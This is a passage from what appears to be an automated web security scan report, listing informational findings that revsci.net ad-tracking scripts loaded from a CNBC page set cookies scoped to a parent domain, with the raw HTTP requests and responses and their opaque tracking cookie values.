rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8pc8wm+eZtGs+CZ5flDQDkg95kUosyaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTV7VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkN9X0yXpPm8m7PF1sT21QfNHLUnt/14AzpDXja0EmmRg/5Yg8s3NMk=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJMOhOXMMVp94u+w/BbtOIGssYybrEIYgJmILsDQmufM9tNd4heJ7St7GX0DL0+fSjWL4XJG/NmHtFFZTHJrhAyDWa82kosKQcxXrWXnZ9nEjIXlwYOmjESzd9K1IVGd6yr0pIiCX3oOM0f+CYs2MLsSkzWzEMWf0Dk+vnMzjToirR+oqwo1fYxUnihSYL10mZ627ZmDsJv0qGr+x9IESn+gi06KDUANyZZamHRg1+kg7nPIWOKW59rU8VqpGQkiNFkNQ+nnETaiCV0VyhtGgmctLQkdAYPMG+jXXDNqBRltnr+K1SsA0KoSWLm27MmWCxuYgkbd2diaVR4aNMzb6TfrfkbpDAEs8CKGpUM4TQCV4eriWxzqA3nvNEvWovfZL30egkaVf9sCZNF62Xav+TZkm/QCFAMR47GMWR2zOrlrsimIH8qxmGyCyCPDrvW+1UO4Shots5vZJd6y5+6nIEkClYj0JmdY/nZDqii9Szmne8p1u0cswdBsKj2Vee1RKvmSTE/Zz57GCSlsXr+qOFnO5jJ2Id5hN6VCi8cDciF/ZX4Cs71KJ2qHUBLQyRxAKhOlVnN+lGd11ePCUCyoyqxCtbG6eC95RH9v496KovSxzm63+RtkWUDxjRPUfu+sGfTdHORhXbtAi0nSVQxHZKv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:41:50 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:41:50 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.169. http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/609031637.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/woLigEF+ZbSAIEl+O6vsJSum2NB/leM3NskvAjloepK63+nuNl6zWuEUaXfqbTAIveV2fYtsdz6AozU2T5CyAg1xOFcbm4AWmnFDgRt82GnmKVUoRF9ghaEp8PJ7QkrtHOr81JWnaR4iWlk5WAn2qYgbPg+CuHVkg39afOkYiI0Ivo5G1HAluU01TMWk+NGDjM86NO3MTZV8xYt30W0MIixhetbvKlazunOtlTIXCAjmT6n0Iu50ISZ4nlDCHu0Phlq7Mdquaquc9MgO9Onat7SRNRSG0xD9KDSCokfusZjpgte0vyiOaoWnQl/LfBb4ge/uX+fGJsqyxIyh7muIdbmlQorpV5R0t1P7q10zagJ6xuF1uacvl56KYKzypf0Zw1L9uMJAxWRVgzegM82Mi9W/ZNXRM+EfaV6qz6m/ZYoAogtPka+xU3zwTvHQ7cimsoGkc/zKCrmhQrYOn3BlxY0P8hi9qyKsU5waiK/YsTVHLhovtcyX8hYUhv+Z7cf0ieKvzDYmvkKhNOBEt+pfLsa64t58Wq8nPtl9rq1Z261m41/8Tznd+lW911ePCUCykyqxCtbK5qB06XchvUu9dXdFAFnd2hBXbHGWocnvddNnbApNM5+im63RWuVYh/QBdckv08; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:08:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/609031637.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_zm5q="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1TaE6wvo9hITCojHr8VbDr0WNwilV5b/Z3v4x1sIAzWnsKdfpk50puyRiA5BAzTbsd6arpoS8BeVDOb7I2MakMEO8YvDy8jbpGaBY9fxQ10eEuLAbjrpoJw/0fQ/ISuczo012GwtISko/5eI4P9Y77AuTKDrWDZ732nqrTu6f1afqTiG1jT/jnW4WvnzJyVQqFVPVqI258qJ/iLsdoWH8Pw3Jy5TkWZz8RhWV0C5FISMr6EthxBkWZrp6YdpDV5xLBG1JR649q/qnNydsRcDjsyhe17Nc6fldd2OkklWc9zOBnfuxrPd8G8L9ghBMBiKuUYIiG1wepk+uwbfbWiR7xq1XXdQ3ahmt1CZ/c/GEKhnfqAKsODKSB8ArvF28pqcWJDVR1+aikOJ28v+guk5+ttcOOTOxhdYdfJp9+bhWi54pDsoTSQ6P1yG1qPQxUf618aEKOJ6FcCYGzZaMptL5dyJcfrSDj9FppsQcfZFOREyGjlAaSW5xag+LlBdOnw7KW1nUNivdUSN3qFZubHJgkUokbHbupzDRqTRQmnclF1Dgcgaw9iyipPolmL/mhYe8NXyMaRVqMJLTo7vrhmH+MM4IhyjiIb08+G8OHHIApsRi+rReMMlWpKBxI5fwe8AHMsqONNcZwHR7Ne8YG3U4vG/g8XNoUF9F+7SKTW7iUyx9hf4tmPkBUOIeAlgui6L0fMYoq3mf+b2LsVWMbSNTxo8Yumx/wvy6g+v3/7yeuy6edLoSKydbUCBPJWMg7U5CAXKtOe3LIh3YbjpRvjA6nxRKciirjFt0W3IM7blj38REy2gL6VpetwIceFT+rRgsF3xNbd+K1egD0iS3+r/eWvIDCXT5FHvKaSZQIATLF/AsLPwEuFfjjdthQ6zpB6VZWRNPF9wzpKoHD6+M/+uiHe3CaZ+xv5PkygQHCZMXwRmvZokEX4XPGSa0iTJQ8zaU+BWLsDn06t6GjrmlRgD01eLGY1VSDkurquq/0NtVDNw7DOXCUxqE3dUPi+MlJwGA9vqhZ0foEAofdWNzOPMGpADHvoEodmykWchbN/Cw83RK+LgeTFZ6k7tukt6q4pMLChT5PYGtL+LodaCcAXqZoKT4adspdUTEOzGm09aGxaQ1DRy0VrGh3QaLNQsTyLChTzY+EMLKcgJT/d9n56/xvZzU2KPEvJ+7otepY08rtEzoLhMHcwSYDf2Xoo2kQG/Q97XoCTf6q/fA+j9OVvcwe3exyEvHRg/roxJajjrtHQAYrN8Hw8TVzSymOwvAyjrN3ZiqPHDy1S6rkfSJnrASwYity7GcaeItVb9GQ2NzKLgfipd1v65mXNA=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd0CGE6g8BwU8BLTkNk43VN7eq0QNSW3IUkipSVn+5jNppl/pEoNPvfI3vGK436wtwsoJn1n5XUlMEI8yxJJW0CUtpmJTRLdy/SAYhSw4DT1hTdGitC3kAcvCp/BgUJQiXMEdHiWA8Fw078Kl36sxjAabpTK2bmR+TJStTJR8CIjx5fdpulXLEvfr/yNGctqY623yllTP4QMZQj5zX5uNtyXaa0pyTEK8/LwW4gPAvUyGn5R5/n+6MxR7C1OB54AwfNZVA7mMinLAFbv3B4+F5OI/m2W/H8ptHfNZ7RuIyF0/Fypho4bHeS46000evIITHJdu/VCu41gIP+1U6cHtVde5YLFMm3T4I0V2q+zl2UQrlTxru3FZYS5ZWpAHKQfMh2oP0EHEKrfDslIHrkPDe1SG2FYT/0+v0bV+DmoPBdSmLlHo9mkS8MXR0ymJQzUOrBWaC8ORKjCYFpXx7T0iuSDIrOXoflcHAG/Tp7pS6jMvR+yHVi98/DswtxLtdMHENjwDTDseA2PsLq9tQfsetSSZc5DwVhcAHK1lMQQjUQgzAxBKVxhrx8HdQKomDDIgr/r3IwsA0WSaXlKO9R1iCsi4Kj5aMk77e0/dp/RE3Y0dEPHlCWIwxuGIpeDmg3R1mGAFh89SHT+4tZl0LBm4Fnysh3c4vD7ftRvxJG3tXOeopJdxs4WWEFkp5Lto5WZCfu1tl+h0qvjwS2cHUhB9q7icSUnAWXV3Bs/D0t+NSqBMfGZrIpxWAOlrRUj+CuVTqMZHgrk/OuA6gnedr6VjxMr61IBehwZg8d1BiJU2A0Ct9Lq4pYRA1zMuMnNZBLisS14LdIn6awmZszpd7/XDseqV73N/hz/L2wcUDu6pgas15FY3tOvgOjFqxpELNzfqH+VSObK/EmjV6h6IyHW8lMKIB3NGkHsArbYq2W2pBRlwoLK9zR+9cTypCZjWpGq3fMDpkIWXAJM4/dK26mEYlEnTrbRYaiQ+ACn0yhe1+HBxrBEmoBYOI0CjNPTXokt8SYhkJoaDK6EKgJzvuRyETCyRmXZiofcapmo0g68/0JZ4VukChD56ZCs8nw1PTlkEJ1SbRCZ/bYR7jh5FRN/ucZSyfnDBdiNquVzBBWjwdmYOXu1fGaT6mUks3oWixkZsPZEnSN3lu6eaKS8Bs85SaPDECzwXWFIKKWYnR8Taw2C0PjQlxor2KUDa9NDa85SMLfcVibAXhkodaAt3bwrWuzzvfKGn8Bc1WgN42NbR29vmVaexiIvoVctGuorPAUqzNR5+iWidyAdjkmXFXXyrtni2a5oRfgfn40JOP1PVgDn0XZZq1//jDAhTbxsxB6H5FeFhBAA1f4QNzbxr0eSYUT/e5uoTQ2uq4SGnla+9xs/h3o3hp6EjxPve5pBW382hBDusOrnJbsgcce4i/IIETRBXuc0XgS4qibgtZwUZbPezRkuw/FW27l/QczaxZUeXPH2bODCovAfwoXBynLizhszgE0vLpizS3ultQzWGZP2TM0RoMUwb/u7D02e04In8qoT0N0SU/tt1w1QI2E74Ab2l3BCZfw+qqzDh7yZufp+rRJzh3Ju9qzbbFE6NjrG/PkgQRikX7i/JmBs/N5q5uSLvLTTe+cADuYiiLZkLYRI3h4YdgKx32DfyeZ4OTkdNk1eSNt+41XERKrQMwKXsfshOGNAI9FxeWdib1/RYqZ1ei/w5LvwJuMdNOLE5caPK90Dbjvlhiu7Fd629J5eQ="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdKIK1Kd0z2/dDbUSHvpHwQxF4/I89/EC9Vys5lJBtwYWO6YoL0H6hBnCHbVvbToc6foFzA/S5oUft3++Z8By6j3g4j4gWPGhmo9uQu30piYpJ6rKG2SAlvK3zJDx2m8WCPhtshtALXAv2bHK8p7fyYExvlhHcgo6bBiuVEn648ssnvfnZ8GBjiQTRN+Xruh5iyxCEZJ1tFHhQzV+RsNthDchzzTL8BoxjAQJF0LJBULDu2lecBoHg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/woLigEF+ZbSAIEl+O6vsJSum2NB/leM3NskvAjloepK63+nuNl6zWuEUaXfqbTAIveV2fYtsdz6AozU2T5CyAg1xOFcbm4AWmnFDgRt82GnmKVUoRF9ghaEp8PJ7QkrtHOr81JWnaR4iWlk5WAn2qYgbPg+CuHVkg39afOkYiI0Ivo5G1HAluU01TMWk+NGDjM86NO3MTZV8xYt30W0MIixhetbvKlazunOtlTIXCAjmT6n0Iu50ISZ4nlDCHu0Phlq7Mdquaquc9MgO9Onat7SRNRSG0xD9KDSCokfusZjpgte0vyiOaoWnQl/LfBb4ge/uX+fGJsqyxIyh7muIdbmlQorpV5R0t1P7q10zagJ6xuF1uacvl56KYKzypf0Zw1L9uMJAxWRVgzegM82Mi9W/ZNXRM+EfaV6qz6m/ZYoAogtPka+xU3zwTvHQ7cimsoGkc/zKCrmhQrYOn3BlxY0P8hi9qyKsU5waiK/YsTVHLhovtcyX8hYUhv+Z7cf0ieKvzDYmvkKhNOBEt+pfLsa64t58Wq8nPtl9rq1Z261m41/8Tznd+lW911ePCUCykyqxCtbK5qB06XchvUu9dXdFAFnd2hBXbHGWocnvddNnbApNM5+im63RWuVYh/QBdckv08; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:08:58 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:08:57 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.170. http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/609523113.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOoqdYRjDKMaw1JOvD8NLJUiDLUJnRBnk1iCQEDVTjL0tuNsq1LBh4dQFP7CuHjAC6pOp24XOz79cZhBbBCL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eqs9X5UFZL/+D9x3mdehfYmtLeN8ZUoZMH/G00T50TrJowfw2ZfmMOhr9IYyFfEOeSlom3PXZQItWBPEkrBxpYR9q/8EElbqGj8HG7JPcfRUU6WSSJXi3pG7800xiuwYalL797YznATh2rdj2WOPuc9qzIF++Sn8+IwHWOfhkwX9mWT9BZ2kuiv+/XVddD7B9l0yEa1PQuobXZ9UyLxLVpddgb+/7ZUh0fuWhRqwfiNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:40:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/609523113.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; 